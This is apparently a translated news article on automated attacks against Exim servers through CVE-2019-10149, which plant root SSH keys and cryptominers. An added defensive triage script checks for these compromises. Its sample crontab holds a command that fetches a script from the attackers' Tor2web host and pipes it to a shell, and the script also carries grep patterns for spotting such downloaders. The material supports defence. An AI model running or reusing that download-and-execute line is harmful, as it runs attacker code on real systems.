Bulk attack on vulnerable Exim-based mail servers

Cybereason security researchers have warned mail server administrators about a massive automated attack that exploits the critical vulnerability CVE-2019-10149 in Exim, which was disclosed last week. In the attack, the attackers achieve execution of their code as root and install cryptocurrency-mining malware on the server.

According to the June automated survey, Exim's share of mail servers is 57.05% (56.56% a year ago), Postfix is used on 34.52% (33.79%), Sendmail on 4.05% (4.59%) and Microsoft Exchange on 0.57% (0.85%). According to the Shodan service, more than 3.6 million mail servers on the Internet that have not been updated to the current Exim 4.92 release remain potentially vulnerable. About 2 million of the potentially vulnerable servers are located in the US and 192 thousand in Russia. According to RiskIQ, 70% of Exim servers have already been updated to version 4.92.


Administrators are advised to urgently install the updates that distributions prepared last week (Debian, Ubuntu, openSUSE, Arch Linux, Fedora, EPEL for RHEL/CentOS). If the system runs a vulnerable Exim version (4.87 to 4.91 inclusive), make sure it has not already been compromised: check crontab for suspicious entries and verify that no additional keys have appeared in the /root/.ssh directory. Firewall log entries showing activity involving the hosts an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io and an7kmd2wp4xo7hpr.onion.sh, which are used during the malware download, also indicate an attack.

The first attacks on Exim servers were recorded on June 9; by June 13 the attack had become widespread. After exploiting the vulnerability, a script is downloaded via tor2web gateways from the Tor hidden service (an7kmd2wp4xo7hpr). The script checks for the presence of OpenSSH (installing it if absent), changes its settings (permitting root login and key authentication) and adds an RSA key for the root user that grants privileged access to the system via SSH.

Once the backdoor is in place, a port scanner is installed on the system to identify other vulnerable servers. The script also searches the system for existing miners and deletes any it finds. In the last stage, the attackers' own miner is downloaded and registered in crontab. The miner is downloaded under the guise of an .ico file (in fact a zip archive with the password "no-password") that contains an ELF executable for Linux with glibc 2.7+.
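A defender-side triage script for the checks recommended above (vulnerable Exim version range, suspicious crontab entries, extra keys in /root/.ssh, firewall log hits on the tor2web hosts) and for the sshd change the attack chain makes. This is an added example, not code from the article, opennet.ru or Cybereason. The IoC hostnames and the 4.87 to 4.91 version range are taken from the article; the crontab, egress log, authorized_keys and sshd_config contents are constructed samples written to a temporary directory so the script runs offline, and the `installed_exim_version` helper assumes `exim -bV` is available on the host being checked.

```shell
#!/bin/sh
# Added triage example for the indicators in the article above; not code from
# the article or any vendor. Hostnames and the vulnerable version range come
# from the article; all sample files below are constructed.

# Tor2web gateways for the hidden service named in the article.
IOC_HOSTS="an7kmd2wp4xo7hpr.tor2web.su an7kmd2wp4xo7hpr.tor2web.io an7kmd2wp4xo7hpr.onion.sh"

# Returns 0 when an Exim version string (e.g. "4.91" or "4.91.1") lies in the
# vulnerable range 4.87 .. 4.91 inclusive, 1 otherwise.
exim_version_vulnerable() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    case "$major$minor" in ''|*[!0-9]*) return 1 ;; esac
    [ "$major" -eq 4 ] && [ "$minor" -ge 87 ] && [ "$minor" -le 91 ]
}

# Version of the installed Exim binary, parsed from "exim -bV" (empty if absent).
installed_exim_version() {
    exim -bV 2>/dev/null | sed -n 's/^Exim version \([0-9.]*\).*/\1/p' | head -n1
}

# Prints crontab lines that pipe downloaded content into a shell or reference
# the attack infrastructure. Exit status 0 if any were found.
suspicious_cron_lines() {
    grep -E 'tor2web|\.onion|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' "$1"
}

# Prints egress/firewall log lines mentioning the IoC hosts. Exit status 0 if any.
ioc_hits_in_log() {
    pattern=
    for h in $IOC_HOSTS; do
        esc=$(printf '%s' "$h" | sed 's/\./\\./g')   # escape dots for grep -E
        pattern="${pattern:+$pattern|}$esc"
    done
    grep -E "$pattern" "$1"
}

# Counts active (non-blank, non-comment) entries in an authorized_keys file so
# that an unexpected extra key stands out against the known baseline.
count_authorized_keys() {
    grep -cvE '^[[:space:]]*(#|$)' "$1" || true
}

# Effective PermitRootLogin value in an sshd_config (first match wins, as in
# sshd; prints an empty line when the keyword is unset).
permit_root_login_setting() {
    awk 'tolower($1) == "permitrootlogin" && v == "" { v = $2 } END { print v }' "$1"
}

# --- constructed sample inputs (stand-ins for the real files on a mail server) ---
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
SAMPLE_CRON=$WORK/crontab;            SAMPLE_LOG=$WORK/egress.log
SAMPLE_KEYS=$WORK/authorized_keys;    SAMPLE_SSHD=$WORK/sshd_config

# Constructed root crontab: one legitimate job, one downloader of the kind described.
cat > "$SAMPLE_CRON" <<'EOF'
0 3 * * * curl -s https://example.com/health >/dev/null
*/5 * * * * wget -q -O - http://an7kmd2wp4xo7hpr.tor2web.io/EXAMPLE_PATH | sh
EOF
# Constructed egress log lines (destination hostnames resolved for readability).
cat > "$SAMPLE_LOG" <<'EOF'
2019-06-13T10:02:11Z mx1 egress ALLOW tcp 10.0.0.5:51234 -> deb.debian.org:80
2019-06-13T10:02:19Z mx1 egress ALLOW tcp 10.0.0.5:51236 -> an7kmd2wp4xo7hpr.tor2web.su:80
EOF
# Constructed /root/.ssh/authorized_keys: the expected ops key plus one unknown key.
cat > "$SAMPLE_KEYS" <<'EOF'
# managed by config management
ssh-ed25519 AAAAC3EXAMPLEKEYDATA ops@mx1
ssh-rsa AAAAB3EXAMPLEKEYDATA
EOF
# Constructed sshd_config after the modification the article describes.
cat > "$SAMPLE_SSHD" <<'EOF'
PermitRootLogin yes
PubkeyAuthentication yes
EOF

# --- demonstration on the samples; on a real host point the functions at
# /var/spool/cron/crontabs/root, the firewall log, /root/.ssh/authorized_keys
# and /etc/ssh/sshd_config, and feed installed_exim_version to the range check ---
for v in 4.86 4.87 4.91 4.92; do
    if exim_version_vulnerable "$v"; then
        echo "Exim $v: in vulnerable range, patch now"
    else
        echo "Exim $v: outside vulnerable range"
    fi
done
echo "Suspicious crontab entries:"; suspicious_cron_lines "$SAMPLE_CRON" || echo "  none"
echo "IoC hits in egress log:";     ioc_hits_in_log "$SAMPLE_LOG"       || echo "  none"
echo "authorized_keys entries for root: $(count_authorized_keys "$SAMPLE_KEYS") (compare with your baseline)"
echo "PermitRootLogin: $(permit_root_login_setting "$SAMPLE_SSHD")"
```

A hit from any of these checks is a reason to treat the host as compromised rather than merely unpatched: patching Exim removes the entry point but does not remove an already installed key, cron job or miner.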

Source: opennet.ru
